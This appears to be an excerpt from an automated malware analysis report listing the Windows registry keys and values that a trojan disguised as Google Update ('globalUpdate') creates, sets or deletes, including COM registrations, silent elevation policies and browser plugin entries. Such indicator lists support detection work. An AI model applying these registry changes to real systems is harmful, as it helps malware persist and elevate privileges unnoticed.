[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"

[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 1C BB 6D 1B 3E 23 5B CA 34 A3 A7 1F 07 11 88"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"

[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"

[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"

[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:1272 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"

[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1456422024"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"

